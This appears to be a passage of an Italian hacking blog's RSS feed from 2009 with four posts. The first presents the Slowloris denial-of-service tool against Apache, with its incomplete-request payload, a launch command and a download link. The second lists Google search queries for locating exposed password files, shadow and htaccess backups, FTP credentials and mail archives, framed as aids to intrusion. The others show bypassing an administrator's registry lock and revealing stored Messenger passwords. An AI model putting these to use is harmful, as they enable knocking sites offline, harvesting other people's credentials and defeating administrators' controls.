			<wfw:commentRss>http://www.n2h.it/hacking/come-sbloccare-l-iphone-con-firmware-301/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Bloccare qualsiasi Web Server Apache con Slowloris DoS Tool</title>
		<link>http://www.n2h.it/hacking/bloccare-qualsiasi-server-apache-con-slowloris-dos-tool/</link>
		<comments>http://www.n2h.it/hacking/bloccare-qualsiasi-server-apache-con-slowloris-dos-tool/#comments</comments>
		<pubDate>Wed, 24 Jun 2009 07:48:12 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[shell script]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=2340</guid>
		<description><![CDATA[
Nonstante Apache sia il web server più diffuso e robusto in circolazione, esso può essere seriamente compromesso utilizzando Slowloris DoS Tool, un semplicissimo tool in grado di lanciare un attacco di tipo DoS (Denial of Service) che in poco tempo consente di esaurire completamente le connessioni HTTP disponibili rendendo così il sito totalmente irraggiungibile.
Di tool [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-2341" title="dos-attack" src="http://www.n2h.it/blog/wp-content/uploads/2009/06/dos-attack.jpg" alt="dos attack" width="384" height="500" /><br />
Nonstante <strong>Apache</strong> sia il <strong>web server</strong> più diffuso e robusto in circolazione, esso può essere seriamente compromesso utilizzando <strong>Slowloris DoS Tool,</strong> un semplicissimo tool in grado di lanciare un <strong>attacco di tipo DoS</strong> (Denial of Service) che in poco tempo consente di esaurire completamente le connessioni HTTP disponibili rendendo così il sito totalmente irraggiungibile.</p>
<p>Di tool in grado di <strong>lanciare attacchi DoS</strong> ce ne sono molti in circolazione e spesso si basano sul vulnerabilità a livello diprotocollo  TCP, ma <strong>Slowloris DoS Tool</strong> è sicuramente quello che si caratterizza meglio di tutti per la banalità del principio di funzionamento e nello stesso tempo per l&#8217;efficacia che riesce ad avere su praticamente tutte le versioni di Apache e di altri Web Server.<span id="more-2340"></span></p>
<p><strong>Slowloris DoS Tool</strong> è un piccolo script scritto in Perl che non fa altro che inviare una <strong>serie continua di richieste HTTP</strong> incomplete verso il server vittima il quale alloca per ognuna di esse una connessione e rimane in attesa di ricevere l&#8217;header HTTP completo che non arriverà mai. più in dettaglio, Slowloris invia la seguente richiesta:</p>
<p><span style="font-family: Courier New;">GET / HTTP/1.1\r\n<br />
Host: host\r\n<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n<br />
Content-Length: 42\r\n</span></p>
<p>Notate che non viene inviato il CRLF che indicherebbe il completamento della richiesta; invece, dopo qualche istante viene inviato l&#8217;header seguente:</p>
<p><span style="font-family: Courier New;">X-a: b\r\n</span></p>
<p>che non ha alcun significato ed induce il server a rimanere in attesa delle successive informazioni che appunto non ariveranno mai.</p>
<p>Questa vulnerabilità sembra affliggere i seguenti web server:</p>
<ul>
<li>Apache 1.*</li>
<li>Apache 2.*</li>
<li>dhttpd</li>
<li>GoAhead WebServer</li>
<li>Squid</li>
</ul>
<p>Mentre sembrano esserne esenti:</p>
<ul>
<li> IIS</li>
<li>lighthttpd</li>
<li>nginx</li>
<li>Cherokee</li>
</ul>
<p>Attualmente l&#8217;unico modo per mitigare e gli effetti di questo tipo di attacco consiste nel limitare il numero di accessi provenienti dal medesimo IP address in un arco di tempo particolarmente breve.</p>
<p>Slowloris DoS Tool è efficace sono se utilizzato su Linux (Windows ha dei limiti troppo restrittivi sul numero di socket gestibili in parallelo). La sintassi per lanciarlo è la seguente:</p>
<p><strong>perl slowloris.pl -dns example.com</strong></p>
<p>Lo scopo di questo articolo è puramente dimostrativo: non mi assumo alcuna responsabilità sull&#8217;uso improprio che protreste dare di questo tool. Tenete solo presente che normalmente tutti i web Server mantengono un log dettagliato di tutte le richieste, per cui non è difficile risalire ad uno specifico IP address.</p>
<p>Scarica <strong><a href="http://ha.ckers.org/slowloris/slowloris.pl">slowloris.pl</a><br />
</strong></p>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.n2h.it/hacking/bloccare-qualsiasi-server-apache-con-slowloris-dos-tool/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>10 originali tecniche di hacking con Google</title>
		<link>http://www.n2h.it/google/10-originali-tecniche-di-hacking-con-google/</link>
		<comments>http://www.n2h.it/google/10-originali-tecniche-di-hacking-con-google/#comments</comments>
		<pubDate>Sat, 20 Jun 2009 13:25:40 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=2297</guid>
		<description><![CDATA[
Che Google sia in grado in indicizzare praticamente qualunque cosa ormai è più che appurato, anzi proprio questa sua caratteristica gioca molto spesso a vantaggio di chi ha delle finalità piuttosto discutibili legate all&#8217;hacking e alla violazione di server Internet e siti web. E&#8217; infatti sufficiente un web server mal configurato per rendere possibile l&#8217;accesso [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-2298" title="google-hacking" src="http://www.n2h.it/blog/wp-content/uploads/2009/06/google-hacking.jpg" alt="google hacking" width="500" height="250" /><br />
Che Google sia in grado in indicizzare praticamente qualunque cosa ormai è più che appurato, anzi proprio questa sua caratteristica gioca molto spesso a vantaggio di chi ha delle finalità piuttosto discutibili legate all&#8217;hacking e alla violazione di server Internet e siti web. E&#8217; infatti sufficiente un web server mal configurato per rendere possibile l&#8217;<strong>accesso del crawler di Google a directory e risorse contententi informazioni sensibili, file di configurazione utenze e password di accesso</strong>. Ed ovviamente quando GoogleBot accede ad una risorsa raggiungibile via HTTP provvede &#8220;giustamente&#8221; ad indicizzarla rendendola quindi disponibile per la ricerca <img src='http://www.n2h.it/blog/wp-includes/images/smilies/icon_wink.gif' alt="icon wink" class='wp-smiley' title="10 originali tecniche di hacking con Google" /> </p>
<p>In questo articolo vedremo un elenco di interessanti <strong>tecniche di hacking basate sull&#8217;utilizzo di Google</strong> per ottenere credenziali di accesso e informazioni utilizzabili per effettuare intrusioni ed attacchi. <span id="more-2297"></span>Per provarle è sufficiente <strong>inserire nella casella di ricerca di Google le stringhe di ricerca riportate di seguito in corsivo</strong>.</p>
<ol>
<li>
<h3>Utenze e password memorizzate su WS FTP e  FlashFXP</h3>
<p>WS FTP e FlashFXP  sono due popolari client FTP che utilizzano rispettivamente un file denominato ws_ftp.ini e flashFXP.ini per salvare le informazioni di accesso ai siti FTP configurati.<br />
Stringa di ricerca per WS FTP: <strong><em>intitle:index.of ws_ftp.ini</em></strong> oppure <strong><em>filetype:ini ws_ftp pwd</em></strong> o <em><strong>&#8220;index of/&#8221; &#8220;ws_ftp.ini&#8221; &#8220;parent directory&#8221;</strong><br />
</em>Stringa di ricerca per FlashFXP:<em> </em><strong><em>filetype:ini inurl:flashFXP.ini</em></strong></li>
<li>
<h3>Utenze e password dei siti creati con Frontpage</h3>
<p>Frontpage è un client ancora largamente utilizzato per creare siti web statici: il sistema di autenticazione automatica per collegarvisi si basa sul file service.pwd che contiene utenze e password criptate che possono essere decodificate con poco sforzo avvalendosi di John The Ripper.<br />
Stringa di ricenca: <strong><em>&#8220;# -FrontPage-&#8221; inurl:service.pwd<br />
</em></strong></li>
<li>
<h3>Files di log con utenze e password</h3>
<p>Sembra incredibile ma succede molto spesso che utenze e password di accesso a siti o aree riservate vengano memorizzati in un file passwords.log. Provate voi stessi&#8230;<br />
Stringa di ricerca: <strong><em>filetype:log inurl:&#8221;password.log&#8221;<br />
</em></strong></li>
<li>
<h3>Download completo del database mdb dei forum Web Wiz Forums</h3>
<p>Se un forum Web Wiz Forums non viene opportunamente configurato, è possibile scaricarne l&#8217;intero database in maniera immediata!<br />
String di ricenca: <strong><em>filetype:mdb wwforum<br />
</em></strong></li>
<li>
<h3>Server con interfaccia VNC esposta via Applet Java</h3>
<p>VNC è un software di controllo remoto che può essere esposto anche via web grazie ad un&#8217;applet Java che normalmente sta in ascolto sulla porta 5800.<br />
String di ricenca: <strong><em>intitle:vnc.desktop inurl:5800 </em></strong>oppure<strong><em> &#8220;VNC Desktop&#8221; inurl:5800<br />
</em></strong></li>
<li>
<h3>File di configurazione di Proftpd</h3>
<p>Il file di configurazione di un server proftpd contiene molte informazioni relative all&#8217;installazione, alle utenze e ai logs.<br />
Stringa di ricerca: <strong><em>filetype:conf inurl:proftpd.conf -sample<br />
</em></strong></li>
<li>
<h3>Creare un&#8217;utenza su Argosoft mail server pro</h3>
<p>Se un server Argosoft mail non è opportunamente configurato, è possibile crearvi una propria utenza di posta accedendo ad un&#8217;url ad hoc.<br />
Stringa di ricerca:<em> <strong>&#8220;adding new user&#8221; inurl:addnewuser -&#8221;there are no domains&#8221;<br />
</strong></em></li>
<li>
<h3>Interfaccia di amministrazione Web Data Administrator per Microsoft SQL Server</h3>
<p>Web Data Administrator è un&#8217;interfaccia web di utilita scritta in ASP.NET ed utilizzata per gestire via web un database SQL Server.<br />
Stringa di ricerca: <strong><em>intitle:&#8221;Web Data Administrator &#8211; Login&#8221;<br />
</em></strong></li>
<li>
<h3>Files di backup di password e configurazioni</h3>
<p>Molti amministratori sono (giustamente) soliti effettuare una copia di backup prima di modificare un file di configurazione e spesso ne cambiano l&#8217;estensione in &#8220;.bak&#8221;.<br />
Stringa di ricerca: <strong><em>filetype:bak inurl:&#8221;htaccess|passwd|shadow|htusers&#8221;<br />
</em></strong></li>
<li>
<h3>Archivi della posta elettronica di Microsoft Outlook</h3>
<p>Outlook salva le email su files con estensione .pst: caricando un file di questo tipo su Outlook è possibile accedere a tutte le email che contiene in maniera immediata.<br />
Stringa di ricerca: <strong><em>outlook filetype:pst</em></strong></li>
</ol>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.n2h.it/google/10-originali-tecniche-di-hacking-con-google/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Bypassare le restrizioni sulla modifica del Registry convertendo i file .reg in .exe</title>
		<link>http://www.n2h.it/software/bypassare-le-restrizioni-sulla-modifica-del-registry-convertendo-i-file-reg-in-exe/</link>
		<comments>http://www.n2h.it/software/bypassare-le-restrizioni-sulla-modifica-del-registry-convertendo-i-file-reg-in-exe/#comments</comments>
		<pubDate>Wed, 06 May 2009 13:22:27 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[software_gratuito]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=2050</guid>
		<description><![CDATA[Gli utenti Windows esperti in sicurezza molto probabilmente sapranno che è possibile disabilitare l&#8217;utilizzo di Regedit (il tool per l&#8217;editing del registry del sistema operativo) modificando il Registry come segue:
ci si posiziona  in KEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
si crea una nuova chiave di tipo DWORD con etichetta &#8220;DisableRegistryTools&#8221; e valore impostato a &#8220;1&#8221; .
Ovviamente questa restrizione viene applicata di [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p>Gli utenti Windows esperti in sicurezza molto probabilmente sapranno che è possibile <strong>disabilitare l&#8217;utilizzo di Regedit</strong> (il tool per l&#8217;editing del registry del sistema operativo) modificando il Registry come segue:</p>
<ul>
<li>ci si posiziona  in <span class="postbody"><span style="font-weight: bold;">KEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System</span></span></li>
<li>si crea una nuova chiave di tipo <strong>DWORD</strong> con etichetta &#8220;<strong>DisableRegistryTools</strong>&#8221; e valore impostato a &#8220;<strong>1</strong>&#8221; .</li>
</ul>
<p>Ovviamente questa restrizione viene applicata di solito con la finalità di <strong>proteggere il sistema operativo da attacchi da parte di virus o intrusioni di hackers</strong>: disattivando l&#8217;editing del Registry, nessun software malevolo avrà la possibilità di modificare alcuna impostazione relativa al funzionamento del sistema operativo come ad esempio la configurazione dei programmi da eseguire all&#8217;avvio del computer.</p>
<p>La cosa da tener però ben presente è che, una volta attivata questa restrizione, non sarà più possibile, con gli strumenti consueti (regedit o esecuzione di un file .reg), effettuare alcuna modifica al registro né tantomeno rimuovere la stessa restrizione! L&#8217;unica soluzione consiste nell&#8217;avvalersi di tools ad hoc che consentono di <strong>modificare il registry a basso livello</strong> o con sistemi alternativi.</p>
<p>Uno di questi strumenti è <strong>Reg2Exe</strong> che semplicemente è in grado di <strong>convertire un file .reg in .exe</strong>: lanciando gli eseguibili generati da Reg2Exe diventa possibile applicare qualunque modifica al Registry pur avendo anche la chiave <strong>DisableRegistryTools </strong>attivata.<span id="more-2050"></span></p>
<p><strong>Reg2Exe</strong> è un&#8217;applicazione gratuita che non necessita di installazione. Per attivarlo è necessario:</p>
<ol>
<li>Scaricare l&#8217;eseguibile (vedi link alla fine dell&#8217;articolo)</li>
<li>Scompattare l&#8217;archivio zip ed avviare l&#8217;eseguibile <em>Reg2Exe.exe</em></li>
<li>Cliccare sul bottone &#8220;<em>Register</em>&#8221;<br />
<img class="alignnone size-full wp-image-2051" title="reg2exe" src="http://www.n2h.it/blog/wp-content/uploads/2009/05/reg2exe.bmp" alt="reg2exe"  /></li>
</ol>
<p>A questo punto, ogni volta che selezionerete un file &#8220;<em>.reg</em>&#8221; e cliccherete col tasto destro del mouse, avrete a disposizione nel menù contestuale una nuova voce &#8220;<em>Convert to Exe</em>&#8221; che vi consentirà di creare l&#8217;eseguibile ad hoc per applicare le vostre modifiche, bypassando così tutte le restrizioni attivate dall&#8217;amministratore del sistema:</p>
<p><img class="alignnone size-full wp-image-2052" title="reg2exe-menu" src="http://www.n2h.it/blog/wp-content/uploads/2009/05/reg2exe-menu.jpg" alt="reg2exe menu" width="326" height="467" /></p>
<p>Scarica <a href="http://www.ctuser.net/content/docs/reg2exe_en.htm" target="_blank"><strong>Reg2Exe</strong></a></p>
<p>Via <a href="http://www.raymond.cc/blog/archives/2009/05/02/reg2exe-converts-reg-to-exe-to-bypass-registry-editing-restriction/" target="_blank">Raymond.cc</a></p>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.n2h.it/software/bypassare-le-restrizioni-sulla-modifica-del-registry-convertendo-i-file-reg-in-exe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Come recuperare la password di Windows Live Messenger</title>
		<link>http://www.n2h.it/software/come-recuperare-la-password-di-windows-live-messenger/</link>
		<comments>http://www.n2h.it/software/come-recuperare-la-password-di-windows-live-messenger/#comments</comments>
		<pubDate>Tue, 24 Mar 2009 08:40:47 +0000</pubDate>
		<dc:creator>davide</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[recupero password]]></category>
		<category><![CDATA[windows_live_messenger]]></category>
		<guid isPermaLink="false">http://www.n2h.it/?p=1892</guid>
		<description><![CDATA[Non vi ricordate più la password di Windows Live Messenger memorizzata nel computer?
Nessun problema: recuperarla è veramente questione di pochi istanti! Ecco come procedere:
Scaricate MSN Password Hacker (si tratta di uno zip da circa 17Kb)
Scompattate l&#8217;eseguibile &#8220;WLMPassword.exe&#8221; e lanciatelo
Inserite l&#8217;indirizzo email del vostro account Windows Live nel primo box denominato &#8220;Filter&#8221;
Cliccate sul bottone &#8220;Check&#8221;
A questo [...]<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></description>
			<content:encoded><![CDATA[<p>Non vi ricordate più la <strong>password di Windows Live Messenger</strong> memorizzata nel computer?</p>
<p>Nessun problema: recuperarla è veramente questione di pochi istanti! Ecco come procedere:</p>
<ol>
<li>Scaricate <a href="http://msn-password-hacker.com">MSN Password Hacker</a> (si tratta di uno zip da circa 17Kb)</li>
<li>Scompattate l&#8217;eseguibile &#8220;WLMPassword.exe&#8221; e lanciatelo</li>
<li>Inserite l&#8217;indirizzo email del vostro <strong>account Windows Live</strong> nel primo box denominato &#8220;Filter&#8221;</li>
<li>Cliccate sul bottone &#8220;Check&#8221;</li>
</ol>
<p><img class="alignnone size-full wp-image-1893" title="windows-live-messenger-password-recovery" src="http://www.n2h.it/blog/wp-content/uploads/2009/03/windows-live-messenger-password-recovery.jpg" alt="windows live messenger password recovery" width="403" height="231" /></p>
<p>A questo punto, se la password viene recuperata con successo, essa comparirà in chiaro all&#8217;interno del box &#8220;Password&#8221;, altrimenti verrà visualizato il testo &#8220;&lt;empty&gt;&#8221;.<span id="more-1892"></span></p>
<p><strong>MSN Password Hacker</strong> è un tool gratuito che vanta più di un milione di downloads: è compatibile con Windows XP/Vista e supporta tutte le ultime versioni di <strong>Windows Live Messenger</strong>.</p>
<p>Scarica  <strong><a href="http://msn-password-hacker.com/wlmpasswords.zip">MSN Password Hacker</a></strong></p>
<p>Via <a href="http://www.technixupdate.com/hack-recover-windows-live-messenger-password/">Technix Update</a></p>
<p><br/>
<div style="border-top: 1px solid rgb(187, 187, 187); border-bottom: 1px solid rgb(187, 187, 187); margin: 10px 0pt; padding: 10px; background: rgb(236, 239, 245) none repeat scroll 0% 0%;font-family:Arial"><strong>Consiglio:</strong> <a style="text-decoration:underline;" href="http://www.liutilities.com/affcb/?id=RBgen&#038;aff=6088&#038;xat=fdd" target="_blank">Clicca qui per avviare una scansione degli errori del sistema ed ottimizzare le prestazioni del PC</a></div>
<div style=" padding:5px;font-size:10px;font-family:Arial">Scarica gratis Google Images Downloader 2.0: [<a href="http://www.n2h.it/gid.php?ver=win">versione per Windows</a>] [<a href="http://www.n2h.it/gid.php?ver=mul">versione multipiattaforma</a>]</div>
</p>
]]></content:encoded>
			<wfw:commentRss>http://www.n2h.it/software/come-recuperare-la-password-di-windows-live-messenger/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

